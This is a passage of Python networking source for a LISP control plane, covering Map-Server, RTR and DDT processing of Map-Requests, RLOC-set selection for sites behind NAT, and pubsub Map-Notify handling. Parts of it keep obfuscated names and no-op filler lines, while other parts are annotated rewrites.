    # must be returned inside an encapsulated RLOC-probe.
    if (map_request.rloc_probe and len(lisp_sockets) == 4):
        public = (itr_rloc.is_private_address() == False)
        addr_str = itr_rloc.print_address_no_iid()
        # Fix: was py2-only lisp_rtr_list.has_key() (removed in py3).
        if ((public and addr_str in lisp_rtr_list) or sport == 0):
            lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
            return

    # Native reply to the requester.
    lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
    return
if 30 - 30: OoO0O00 / ooOoO0o % ooOoO0o
if 40 - 40: i1IIi . iIii1I11I1II1 * OoOoOO00
if 83 - 83: iIii1I11I1II1 + Ii1I - Ii1I % II111iiii
if 82 - 82: O0
if 18 - 18: iII111i . IiII . I1IiiI
if 40 - 40: IiII / oO0o + OoooooooOO / iII111i / II111iiii + i1IIi
if 33 - 33: I11i + I1ii11iIi11i + i11iIiiIii * I1IiiI % oO0o % OoooooooOO
def lisp_rtr_process_map_request ( lisp_sockets , map_request , source , sport ,
    ttl ) :
    # RTR processing of an RLOC-probe Map-Request: reply with this
    # RTR's own local RLOCs (advertised at priority 254) rather than a
    # database mapping.
    if 4 - 4: OoO0O00 . I1IiiI - O0 % iII111i . OOooOOo
    if 69 - 69: OoooooooOO
    if 19 - 19: O0 + iIii1I11I1II1 / OoOoOO00 / oO0o + II111iiii - OOooOOo
    if 70 - 70: i1IIi * o0oOOo0O0Ooo + I1Ii111 . ooOoO0o - O0 + i11iIiiIii
    # Reply to the first ITR-RLOC; if it is private (behind a NAT),
    # answer the packet's outer source address instead.
    oO00o0o0O = map_request . itr_rlocs [ 0 ]
    if ( oO00o0o0O . is_private_address ( ) ) : oO00o0o0O = source
    oOO000 = map_request . nonce
    if 81 - 81: iIii1I11I1II1 - OoO0O00 . i11iIiiIii
    OOo0O0O0o0 = map_request . target_eid
    O0o00oOOOO00 = map_request . target_group
    if 4 - 4: o0oOOo0O0Ooo / OoO0O00 - I11i
    # Build an RLOC-set from our configured IPv4/IPv6 RLOCs.
    ooo0oo = [ ]
    for OOOOOo0O0oOO in [ lisp_myrlocs [ 0 ] , lisp_myrlocs [ 1 ] ] :
        if ( OOOOOo0O0oOO == None ) : continue
        oOo00O = lisp_rloc ( )
        oOo00O . rloc . copy_address ( OOOOOo0O0oOO )
        oOo00O . priority = 254
        ooo0oo . append ( oOo00O )
    if 99 - 99: OoO0O00 * I11i
    if 33 - 33: I1Ii111 % IiII * OOooOOo - I1Ii111
    oO0O0o00oOo = lisp_nonce_echoing
    oOoo0oO = map_request . keys
    if 100 - 100: ooOoO0o . i11iIiiIii * Oo0Ooo - i11iIiiIii
    IIii1i = lisp_build_map_reply ( OOo0O0O0o0 , O0o00oOOOO00 , ooo0oo , oOO000 , LISP_NO_ACTION ,
        1440 , True , oOoo0oO , oO0O0o00oOo , True , ttl )
    lisp_send_map_reply ( lisp_sockets , IIii1i , oO00o0o0O , sport )
    return
if 72 - 72: oO0o + I11i . OoooooooOO
if 84 - 84: oO0o * oO0o - i1IIi + ooOoO0o
if 83 - 83: i1IIi
if 85 - 85: i11iIiiIii / OoO0O00 / oO0o
if 12 - 12: iII111i % OOooOOo % i1IIi
if 17 - 17: IiII
if 63 - 63: ooOoO0o . i11iIiiIii / iIii1I11I1II1
if 8 - 8: i11iIiiIii . IiII * iIii1I11I1II1 * I1IiiI * Ii1I * i11iIiiIii
if 24 - 24: I1IiiI * I11i - o0oOOo0O0Ooo / iII111i + IiII - I1ii11iIi11i
if 53 - 53: I11i / I1IiiI - iIii1I11I1II1 - o0oOOo0O0Ooo * OoOoOO00
def lisp_get_private_rloc_set ( target_site_eid , seid , group ) :
    # Decide whether the requester (the site registered under source
    # EID 'seid'/'group') may receive the private RLOCs registered for
    # 'target_site_eid' instead of the public ones: yes when both sites
    # share the same public (NAT) address with no site-id configured,
    # or when their configured site-ids match. Otherwise return the
    # registered RLOC-set unchanged.
    ooo0oo = target_site_eid . registered_rlocs
    if 86 - 86: iIii1I11I1II1 - I1Ii111
    OoO0OOOOO0OO = lisp_site_eid_lookup ( seid , group , False )
    if ( OoO0OOOOO0OO == None ) : return ( ooo0oo )
    if 5 - 5: o0oOOo0O0Ooo
    if 58 - 58: oO0o * II111iiii * Oo0Ooo - I1IiiI % iII111i
    if 77 - 77: I11i / iII111i * o0oOOo0O0Ooo % iIii1I11I1II1
    if 26 - 26: i1IIi / OoO0O00 / IiII
    # Collect deep-copies of the target site's private RLOCs and find
    # its first public non-RTR RLOC.
    oO00OoO0O0O = None
    I1III = [ ]
    for iIII in ooo0oo :
        if ( iIII . is_rtr ( ) ) : continue
        if ( iIII . rloc . is_private_address ( ) ) :
            I1iiI1 = copy . deepcopy ( iIII )
            I1III . append ( I1iiI1 )
            continue
        if 74 - 74: I1ii11iIi11i / i11iIiiIii - II111iiii . Oo0Ooo / ooOoO0o
        oO00OoO0O0O = iIII
        break
    if 55 - 55: OoO0O00 % IiII
    if ( oO00OoO0O0O == None ) : return ( ooo0oo )
    oO00OoO0O0O = oO00OoO0O0O . rloc . print_address_no_iid ( )
    if 93 - 93: OoO0O00 . I1ii11iIi11i / OOooOOo % OoooooooOO + i1IIi + I1Ii111
    if 94 - 94: II111iiii + i11iIiiIii % Ii1I / ooOoO0o * OoOoOO00
    if 68 - 68: O0 / Oo0Ooo / iIii1I11I1II1
    if 63 - 63: I1Ii111 + iII111i
    # Find the requesting site's first public non-RTR RLOC.
    iI1III = None
    for iIII in OoO0OOOOO0OO . registered_rlocs :
        if ( iIII . is_rtr ( ) ) : continue
        if ( iIII . rloc . is_private_address ( ) ) : continue
        iI1III = iIII
        break
    if 84 - 84: ooOoO0o % I1ii11iIi11i + i1IIi * ooOoO0o + OOooOOo - IiII
    if ( iI1III == None ) : return ( ooo0oo )
    iI1III = iI1III . rloc . print_address_no_iid ( )
    if 42 - 42: Ii1I - i11iIiiIii + I11i * O0
    if 51 - 51: i1IIi . Oo0Ooo + OoOoOO00 / OoooooooOO / oO0o
    if 58 - 58: I1ii11iIi11i / Ii1I * ooOoO0o - IiII
    if 67 - 67: ooOoO0o - ooOoO0o * o0oOOo0O0Ooo
    # No site-id configured: same public address means both xTRs sit
    # behind the same NAT, so hand out the private RLOCs.
    I1111iii1ii11 = target_site_eid . site_id
    if ( I1111iii1ii11 == 0 ) :
        if ( iI1III == oO00OoO0O0O ) :
            lprint ( "Return private RLOCs for sites behind {}" . format ( oO00OoO0O0O ) )
            if 65 - 65: O0
            return ( I1III )
        if 37 - 37: I1ii11iIi11i - Oo0Ooo . i11iIiiIii / i11iIiiIii + oO0o
        return ( ooo0oo )
    if 19 - 19: i1IIi / i1IIi - OoooooooOO - OOooOOo . i1IIi
    if 57 - 57: OOooOOo / I1ii11iIi11i * oO0o
    if 53 - 53: o0oOOo0O0Ooo * Ii1I
    if 42 - 42: I11i + iII111i / iIii1I11I1II1
    if 1 - 1: O0 - II111iiii
    if 75 - 75: II111iiii / OoO0O00 % II111iiii
    if 3 - 3: Ii1I - Ii1I % I1ii11iIi11i
    # Matching configured site-ids also share the private network.
    if ( I1111iii1ii11 == OoO0OOOOO0OO . site_id ) :
        lprint ( "Return private RLOCs for sites in site-id {}" . format ( I1111iii1ii11 ) )
        return ( I1III )
    if 44 - 44: OOooOOo - o0oOOo0O0Ooo
    return ( ooo0oo )
if 69 - 69: IiII + I1ii11iIi11i / o0oOOo0O0Ooo / OOooOOo
if 31 - 31: oO0o + I1ii11iIi11i * i1IIi % I1IiiI % I1IiiI + iIii1I11I1II1
if 62 - 62: OoooooooOO
if 38 - 38: iII111i % iII111i * ooOoO0o / OoO0O00 + ooOoO0o
if 52 - 52: ooOoO0o . iIii1I11I1II1 / iIii1I11I1II1 % oO0o - oO0o * II111iiii
if 57 - 57: I1Ii111
if 23 - 23: I1ii11iIi11i + II111iiii
if 99 - 99: o0oOOo0O0Ooo . I1IiiI + o0oOOo0O0Ooo * o0oOOo0O0Ooo / O0
if 27 - 27: OOooOOo - I1Ii111
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
    """
    Split a registered RLOC-set into RTR and non-RTR subsets and decide
    which subset the requester should see.

    RLOC records registered with priority 254 are RTRs.  When the set
    contains no RTRs, the registration is returned untouched.  When the
    Map-Request was sourced by one of the RTRs, only the non-RTR RLOCs
    (subject to the unreachable-priority-255 filters) are returned.
    Otherwise the requester is assumed to sit behind a NAT and receives
    the site's private RLOCs plus the RTR RLOCs.
    """
    rtr_list = []
    rloc_set = []

    #
    # Determine whether any RTRs were registered and whether the
    # Map-Request source is itself one of them.
    #
    source_is_rtr = False
    saw_rtr = False
    for rloc_entry in registered_rloc_set:
        if (rloc_entry.priority != 254): continue
        saw_rtr = True
        if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
        source_is_rtr = True
        break
    #endfor

    #
    # No RTRs in the registration -- hand it back unchanged.
    #
    if (saw_rtr == False): return(registered_rloc_set)

    #
    # When this RTR is itself behind a NAT, do not hand out private
    # addresses.  NOTE(review): flag comes from the environment.
    #
    rtr_behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    #
    # Partition the registration into RTR and non-RTR entries, honoring
    # the "unreachable" priority (255) for the requested delivery mode.
    #
    for rloc_entry in registered_rloc_set:
        if (rtr_behind_nat and rloc_entry.rloc.is_private_address()): continue
        if (multicast == False and rloc_entry.priority == 255): continue
        if (multicast and rloc_entry.mpriority == 255): continue
        if (rloc_entry.priority == 254):
            rtr_list.append(rloc_entry)
        else:
            rloc_set.append(rloc_entry)
        #endif
    #endfor

    #
    # An RTR asked -- give it the ETR's actual RLOCs.
    #
    if (source_is_rtr): return(rloc_set)

    #
    # An ITR behind a NAT asked -- give it the private RLOCs (usable for
    # same-site shortcuts) followed by the RTR RLOCs.
    #
    rloc_set = [e for e in registered_rloc_set if e.rloc.is_private_address()]
    rloc_set += rtr_list
    return(rloc_set)
if 66 - 66: I1IiiI * OoOoOO00 . I1IiiI / Oo0Ooo - Ii1I
if 69 - 69: iIii1I11I1II1 % iII111i + ooOoO0o * i1IIi + iII111i * I1Ii111
if 67 - 67: Ii1I % Oo0Ooo - Oo0Ooo . I11i + IiII
if 73 - 73: Oo0Ooo + iIii1I11I1II1 . iIii1I11I1II1
if 73 - 73: ooOoO0o + OoOoOO00
if 61 - 61: I1Ii111 * I1Ii111 % OOooOOo
if 31 - 31: oO0o + Ii1I - iIii1I11I1II1 / i11iIiiIii
if 9 - 9: IiII % OoO0O00
if 58 - 58: iII111i
if 12 - 12: OoO0O00
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
    """
    Record a pubsub subscription for 'reply_eid'.

    Builds a lisp_pubsub entry from the requester's ITR RLOC, source
    port, nonce, TTL and xTR-ID, and files it under the EID-prefix so
    later changes can trigger Map-Notify messages to the subscriber.
    """
    lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id).add(reply_eid)
    return
if 22 - 22: iIii1I11I1II1 + Ii1I
if 73 - 73: I1IiiI / OoO0O00 / OoooooooOO
if 14 - 14: ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i . IiII + I1ii11iIi11i
if 30 - 30: I1ii11iIi11i + iIii1I11I1II1 . I1ii11iIi11i
if 9 - 9: I1IiiI - Ii1I * II111iiii - I11i
if 85 - 85: oO0o % ooOoO0o / OOooOOo
if 50 - 50: O0 * O0 / iIii1I11I1II1
if 31 - 31: I1IiiI / o0oOOo0O0Ooo
if 70 - 70: I1IiiI
if 36 - 36: ooOoO0o . oO0o . I11i - I1ii11iIi11i / OoOoOO00 * Oo0Ooo
if 42 - 42: OoooooooOO / o0oOOo0O0Ooo . Ii1I * iII111i * I1IiiI - Oo0Ooo
if 76 - 76: oO0o * II111iiii
if 81 - 81: I11i
if 2 - 2: OoOoOO00
if 75 - 75: I1IiiI - OoooooooOO * I1Ii111
def lisp_convert_reply_to_notify(packet):
    """
    Rewrite an already-built Map-Reply packet as a Map-Notify.

    Keeps the record count and nonce from the Map-Reply, swaps the type
    field to Map-Notify, and inserts a zeroed word where the Map-Notify
    key-id/alg-id/auth-len fields live.  Returns the new packet.
    """
    #
    # Pull the record count out of the first header word.
    #
    first_long = struct.unpack("I", packet[0:4])[0]
    record_count = socket.ntohl(first_long) & 0xff

    #
    # Save the nonce and strip the Map-Reply header.
    #
    nonce = packet[4:12]
    body = packet[12::]

    #
    # Build a Map-Notify header carrying the same record count, plus a
    # zeroed authentication-related word.
    #
    header = (LISP_MAP_NOTIFY << 28) | record_count
    header = struct.pack("I", socket.htonl(header))
    auth = struct.pack("I", 0)

    #
    # Header, nonce, zeroed auth fields, then the original EID-records.
    #
    return(header + nonce + auth + body)
if 9 - 9: II111iiii * OOooOOo / Oo0Ooo + iIii1I11I1II1 % I1IiiI
if 95 - 95: I1Ii111 . IiII % OoO0O00 - OOooOOo - I11i
if 55 - 55: OoooooooOO % I1ii11iIi11i % iII111i / IiII
if 65 - 65: II111iiii
if 58 - 58: iIii1I11I1II1 / i11iIiiIii . iII111i . OOooOOo * I1ii11iIi11i + OoooooooOO
if 13 - 13: OoooooooOO + iII111i * i11iIiiIii % IiII + oO0o . o0oOOo0O0Ooo
if 31 - 31: o0oOOo0O0Ooo - ooOoO0o
if 40 - 40: O0 / OoOoOO00 - I1Ii111
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
    """
    Send a Map-Notify to every subscriber of an EID-prefix.

    Walks the pubsub cache entry for 'eid' and builds one Map-Notify
    per subscriber, bumping each subscription's map-notify counter.
    """
    prefix_str = eid.print_prefix()
    if (prefix_str not in lisp_pubsub_cache): return

    for subscription in lisp_pubsub_cache[prefix_str].values():
        subscriber_itr = subscription.itr
        subscriber_port = subscription.port
        itr_str = red(subscriber_itr.print_address_no_iid(), False)
        tag = bold("subscriber", False)
        xtr_id_str = "0x" + lisp_hex_string(subscription.xtr_id)
        nonce_str = "0x" + lisp_hex_string(subscription.nonce)

        lprint("  Notify {} {}:{} xtr-id {} for {}, nonce {}".format(tag,
            itr_str, subscriber_port, xtr_id_str, green(prefix_str, False),
            nonce_str))

        lisp_build_map_notify(lisp_sockets, eid_record, [prefix_str], 1,
            subscriber_itr, subscriber_port, subscription.nonce, 0, 0, 0,
            site, False)
        subscription.map_notify_count += 1
    #endfor
    return
if 66 - 66: I1ii11iIi11i - oO0o - OoO0O00 * Oo0Ooo
if 47 - 47: o0oOOo0O0Ooo
if 88 - 88: iIii1I11I1II1 + OOooOOo . II111iiii / i11iIiiIii % OOooOOo % IiII
if 38 - 38: OOooOOo
if 82 - 82: OoOoOO00 % II111iiii * ooOoO0o + OoooooooOO + I1IiiI
if 89 - 89: ooOoO0o % i1IIi - OoooooooOO
if 100 - 100: Ii1I % I1ii11iIi11i % I1IiiI
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
    ttl, xtr_id):
    """
    Handle a Map-Request that had the subscribe-bit set.

    Stores pubsub state for the requested EID-prefix, then acknowledges
    the subscription by converting the already-built Map-Reply into a
    Map-Notify and sending it to the requesting ITR.
    """
    #
    # Remember the subscription so future changes trigger Map-Notifies.
    #
    lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)

    eid_str = green(reply_eid.print_prefix(), False)
    itr_str = red(itr_rloc.print_address_no_iid(), False)
    notify_str = bold("Map-Notify", False)
    xtr_id = "0x" + lisp_hex_string(xtr_id)
    lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(
        notify_str, eid_str, itr_str, xtr_id))

    #
    # Ack the subscriber with a Map-Notify carrying the reply contents.
    #
    packet = lisp_convert_reply_to_notify(packet)
    lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
    return
if 7 - 7: i1IIi - OOooOOo
if 11 - 11: O0 * OoOoOO00 - OOooOOo + iII111i * OoO0O00
if 41 - 41: I1Ii111 - i11iIiiIii + O0
if 24 - 24: iIii1I11I1II1 * OoO0O00 / iII111i % OoOoOO00 % i11iIiiIii * I11i
if 89 - 89: oO0o / iIii1I11I1II1 - O0 . o0oOOo0O0Ooo % oO0o
if 73 - 73: IiII + I11i % I1IiiI * iII111i . O0
if 17 - 17: OoO0O00 * OoOoOO00 % O0 % iII111i / i1IIi
if 100 - 100: i11iIiiIii
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
    mr_sport, ecm_source):
    """
    Map-Server processing of a received Map-Request.

    Verifies any Map-Request signature, looks the requested EID up in
    the site cache, and then either:
      - sends a negative Map-Reply (site unknown or not registered),
      - proxy-replies with the site's registered RLOC-set (when forced,
        requested, NAT-traversal is in use, or policy dictates), or
      - forwards the Map-Request inside an ECM to one of the site's
        registered ETRs.

    Returns [eid, group, ddt-action] which the caller uses when this
    Map-Server also acts as a DDT node.

    Bug fixed: in the zero-registered-RLOCs branch, .format() previously
    bound only to the second string literal of a concatenation, so the
    log message printed literal '{}' placeholders.
    """
    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = lisp_print_eid_tuple(eid, group)
    itr_rloc = map_request.itr_rlocs[0]
    xtr_id = map_request.xtr_id
    nonce = map_request.nonce
    action = LISP_NO_ACTION
    pubsub = map_request.subscribe_bit

    #
    # Verify the signature when the target EID is a crypto-hash EID.
    #
    sig_good = True
    is_crypto_eid = (lisp_get_eid_hash(eid) != None)
    if (is_crypto_eid):
        sig = map_request.map_request_signature
        if (sig == None):
            sig_good = False
            lprint(("EID-crypto-hash signature verification {}, " +
                "no signature found").format(bold("failed", False)))
        else:
            sig_eid = map_request.signature_eid
            hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
            if (sig_good):
                sig_good = map_request.verify_map_request_sig(pubkey)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".format(sig_eid.print_address(), hash_eid.print_address()))
            #endif

            status = bold("passed", False) if sig_good else bold("failed",
                False)
            lprint("EID-crypto-hash signature verification {}".format(status))
        #endif
    #endif

    #
    # Do not create subscription state for requests that fail signature
    # verification.
    #
    if (pubsub and sig_good == False):
        pubsub = False
        lprint("Suppress creating pubsub state due to signature failure")
    #endif

    #
    # Reply to the ITR-RLOC when it is in the same address family as the
    # ECM source; otherwise reply to the ECM source itself.
    #
    reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source

    site_eid = lisp_site_eid_lookup(eid, group, False)

    if (site_eid == None or site_eid.is_star_g()):
        not_found = bold("Site not found", False)
        lprint("{} for requested EID {}".format(not_found,
            green(eid_str, False)))

        #
        # No site configured: negative Map-Reply with a 15-minute TTL.
        #
        lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce,
            itr_rloc, mr_sport, 15, xtr_id, pubsub)

        return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
    #endif

    site_eid_str = site_eid.print_eid_tuple()
    site_name = site_eid.site.site_name

    #
    # A site may require signed Map-Requests even for non-crypto EIDs.
    #
    if (is_crypto_eid == False and site_eid.require_signature):
        sig = map_request.map_request_signature
        sig_eid = map_request.signature_eid
        if (sig == None or sig_eid.is_null()):
            lprint("Signature required for site {}".format(site_name))
            sig_good = False
        else:
            sig_eid = map_request.signature_eid
            hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
            if (sig_good):
                sig_good = map_request.verify_map_request_sig(pubkey)
            else:
                lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".format(sig_eid.print_address(), hash_eid.print_address()))
            #endif

            status = bold("passed", False) if sig_good else bold("failed",
                False)
            lprint("Required signature verification {}".format(status))
        #endif
    #endif

    #
    # Site found but not registered: negative Map-Reply with a short TTL.
    #
    if (sig_good and site_eid.registered == False):
        lprint("Site '{}' with EID-prefix {} is not registered for EID {}".format(site_name, green(site_eid_str, False), green(eid_str, False)))

        #
        # Widen the reply coverage to the configured prefix unless the
        # site accepts more-specific registrations.
        #
        if (site_eid.accept_more_specifics == False):
            eid = site_eid.eid
            group = site_eid.group
        #endif

        ttl = 1
        if (site_eid.force_ttl != None):
            ttl = site_eid.force_ttl | 0x80000000
        #endif

        lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce,
            itr_rloc, mr_sport, ttl, xtr_id, pubsub)

        return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
    #endif

    #
    # Decide whether to proxy-reply on behalf of the site.
    #
    nat_forced = False
    reply_reason = ""
    proxy_reply = False
    if (site_eid.force_nat_proxy_reply):
        reply_reason = ", nat-forced"
        nat_forced = True
        proxy_reply = True
    elif (site_eid.force_proxy_reply):
        reply_reason = ", forced"
        proxy_reply = True
    elif (site_eid.proxy_reply_requested):
        reply_reason = ", requested"
        proxy_reply = True
    elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
        reply_reason = ", drop-to-pitr"
        action = LISP_DROP_ACTION
    elif (site_eid.proxy_reply_action != ""):
        action = site_eid.proxy_reply_action
        reply_reason = ", forced, action {}".format(action)
        action = LISP_DROP_ACTION if (action == "drop") else \
            LISP_NATIVE_FORWARD_ACTION
    #endif

    #
    # Apply any policy configured for the site when proxy-replying.
    #
    policy_drop = False
    policy = None
    if (proxy_reply and site_eid.policy in lisp_policies):
        p = lisp_policies[site_eid.policy]
        if (p.match_policy_map_request(map_request, mr_source)): policy = p

        if (policy):
            match_str = bold("matched", False)
            lprint("Map-Request {} policy '{}', set-action '{}'".format(
                match_str, p.policy_name, p.set_action))
        else:
            match_str = bold("no match", False)
            lprint("Map-Request {} for policy '{}', implied drop".format(
                match_str, p.policy_name))
            policy_drop = True
        #endif
    #endif

    if (reply_reason != ""):
        lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}".format(green(eid_str, False), site_name, green(site_eid_str, False),
            reply_reason))

        rloc_set = site_eid.registered_rlocs
        ttl = 1440
        if (nat_forced):
            #
            # Same-site requesters get the site's private RLOCs.
            #
            if (site_eid.site_id != 0):
                source_eid = map_request.source_eid
                rloc_set = lisp_get_private_rloc_set(site_eid, source_eid,
                    group)
            #endif
            if (rloc_set == site_eid.registered_rlocs):
                multicast = (site_eid.group.is_null() == False)
                partial_set = lisp_get_partial_rloc_set(rloc_set, reply_dest,
                    multicast)
                if (partial_set != rloc_set):
                    ttl = 15
                    rloc_set = partial_set
                #endif
            #endif
        #endif

        #
        # A configured force-ttl overrides the default; high-order bit set
        # as in the not-registered path above.
        #
        if (site_eid.force_ttl != None):
            ttl = site_eid.force_ttl | 0x80000000
        #endif

        #
        # Apply matched-policy overrides to the TTL and RLOC-set.
        #
        if (policy):
            if (policy.set_record_ttl):
                ttl = policy.set_record_ttl
                lprint("Policy set-record-ttl to {}".format(ttl))
            #endif
            if (policy.set_action == "drop"):
                lprint("Policy set-action drop, send negative Map-Reply")
                action = LISP_POLICY_DENIED_ACTION
                rloc_set = []
            else:
                policy_rloc = policy.set_policy_map_reply()
                if (policy_rloc): rloc_set = [policy_rloc]
            #endif
        #endif

        if (policy_drop):
            lprint("Implied drop action, send negative Map-Reply")
            action = LISP_POLICY_DENIED_ACTION
            rloc_set = []
        #endif

        echo_nonce_capable = site_eid.echo_nonce_capable

        #
        # Failed signature checks get an auth-failure action and no RLOCs.
        #
        if (sig_good):
            reply_eid = site_eid.eid
            reply_group = site_eid.group
        else:
            reply_eid = eid
            reply_group = group
            action = LISP_AUTH_FAILURE_ACTION
            rloc_set = []
        #endif

        #
        # Build the Map-Reply and either store pubsub state (subscribe-bit
        # set) or send the reply directly.
        #
        packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
            nonce, action, ttl, False, None, echo_nonce_capable, False)

        if (pubsub):
            lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
                mr_sport, nonce, ttl, xtr_id)
        else:
            lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
        #endif

        return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
    #endif

    #
    # Not proxy-replying: forward the Map-Request to one of the site's ETRs.
    #
    rloc_count = len(site_eid.registered_rlocs)
    if (rloc_count == 0):
        # Fix: parenthesize the concatenation so .format() applies to the
        # whole message, not only the second literal.
        lprint(("Requested EID {} found site '{}' with EID-prefix {} with " +
            "no registered RLOCs").format(green(eid_str, False), site_name,
            green(site_eid_str, False)))
        return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
    #endif

    #
    # Hash the source EID (or the target when no source is supplied) to
    # pick one of the registered ETRs deterministically.
    #
    hash_source = map_request.target_eid if map_request.source_eid.is_null() \
        else map_request.source_eid
    etr_index = map_request.target_eid.hash_address(hash_source)
    etr_index %= rloc_count
    etr = site_eid.registered_rlocs[etr_index]

    if (etr.rloc.is_null()):
        lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " +
            "EID-prefix {}, no RLOC address").format(green(eid_str, False),
            site_name, green(site_eid_str, False)))
    else:
        lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " +
            "EID-prefix {}").format(green(eid_str, False),
            red(etr.rloc.print_address(), False), site_name,
            green(site_eid_str, False)))

        #
        # Encapsulate the original Map-Request in an ECM to the chosen ETR.
        #
        lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
            map_request.target_eid, etr.rloc, to_etr=True)
    #endif

    return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
if 98 - 98: oO0o . Oo0Ooo
if 9 - 9: I1Ii111 % IiII - i11iIiiIii - OOooOOo % iII111i % OoooooooOO
if 6 - 6: i1IIi - II111iiii * OoOoOO00 + oO0o
if 6 - 6: I1IiiI - ooOoO0o + I1IiiI + OoO0O00 - i11iIiiIii % ooOoO0o
if 64 - 64: OoooooooOO + OOooOOo
if 36 - 36: I1IiiI - Ii1I / I1ii11iIi11i + Oo0Ooo % I1ii11iIi11i
if 86 - 86: iIii1I11I1II1 * OoO0O00
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
    """
    DDT-node / Map-Server processing of a Map-Request received in an
    ECM: answer with a Map-Referral describing the delegation (or the
    absence of one) for the requested EID.
    """
    eid = map_request.target_eid
    group = map_request.target_group
    eid_str = lisp_print_eid_tuple(eid, group)
    nonce = map_request.nonce
    action = LISP_DDT_ACTION_NULL

    #
    # As a Map-Server consult the site cache; as a pure DDT node consult
    # the delegation cache.
    #
    ddt_entry = None
    if (lisp_i_am_ms):
        site_eid = lisp_site_eid_lookup(eid, group, False)
        if (site_eid == None): return

        if (site_eid.registered):
            action = LISP_DDT_ACTION_MS_ACK
            ttl = 1440
        else:
            #
            # Unregistered site: referral covers the hole with a short TTL.
            #
            eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
            action = LISP_DDT_ACTION_MS_NOT_REG
            ttl = 1
        #endif
    else:
        ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
        if (ddt_entry == None):
            action = LISP_DDT_ACTION_NOT_AUTH
            ttl = 0
            lprint("DDT delegation entry not found for EID {}".format(
                green(eid_str, False)))
        elif (ddt_entry.is_auth_prefix()):
            #
            # Authoritative but no delegation: report a delegation hole
            # using the least-specific covering prefix.
            #
            action = LISP_DDT_ACTION_DELEGATION_HOLE
            ttl = 15
            auth_prefix_str = ddt_entry.print_eid_tuple()
            lprint(("DDT delegation entry not found but auth-prefix {} " +
                "found for EID {}").format(auth_prefix_str,
                green(eid_str, False)))

            if (group.is_null()):
                eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
                    lisp_ddt_cache)
            else:
                group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
                    lisp_ddt_cache)
                eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
                    ddt_entry.source_cache)
            #endif
            ddt_entry = None
        else:
            auth_prefix_str = ddt_entry.print_eid_tuple()
            lprint("DDT delegation entry {} found for EID {}".format(
                auth_prefix_str, green(eid_str, False)))
            ttl = 1440
        #endif
    #endif

    #
    # Build and send the Map-Referral.  Requests whose upper nonce half is
    # not the special 0xdfdf0e1d value are answered on the LISP control
    # port -- presumably this distinguishes diagnostic (lig-style) requests;
    # NOTE(review): confirm the magic-nonce convention.
    #
    map_referral = lisp_build_map_referral(eid, group, ddt_entry, action,
        ttl, nonce)
    nonce = map_request.nonce >> 32
    if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, map_referral, ecm_source, port)
    return
if 30 - 30: i1IIi + II111iiii + OoOoOO00 + I1ii11iIi11i % ooOoO0o % OOooOOo
if 40 - 40: I1IiiI % I1IiiI - i11iIiiIii % OoOoOO00
if 17 - 17: ooOoO0o - i1IIi
if 73 - 73: iIii1I11I1II1 - I1Ii111 % Oo0Ooo . O0
if 16 - 16: OoO0O00 / Oo0Ooo / IiII . Oo0Ooo - OoooooooOO
if 5 - 5: OoOoOO00 . I11i
if 28 - 28: I11i % OOooOOo + Oo0Ooo / OoO0O00 % o0oOOo0O0Ooo + OoO0O00
if 20 - 20: ooOoO0o . iII111i % OOooOOo + i11iIiiIii
if 64 - 64: i1IIi . o0oOOo0O0Ooo * I1Ii111 - O0
if 76 - 76: I1IiiI % Ii1I + OoO0O00 + I1ii11iIi11i * II111iiii + Oo0Ooo
if 3 - 3: Ii1I - I1IiiI + O0
if 90 - 90: Ii1I + OoooooooOO . i11iIiiIii / Oo0Ooo % OoOoOO00 / IiII
if 45 - 45: OoooooooOO / oO0o . I1ii11iIi11i + OOooOOo
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
    """
    Widen neg_prefix.mask_len so the negative prefix still distinguishes
    'eid' from 'entry_prefix'.

    hash_address() yields the XOR of the two addresses; the position of
    the most-significant differing bit is the minimum mask length that
    separates them.  neg_prefix.mask_len is raised to that value when it
    is currently shorter.  Returns None; neg_prefix is updated in place.
    """
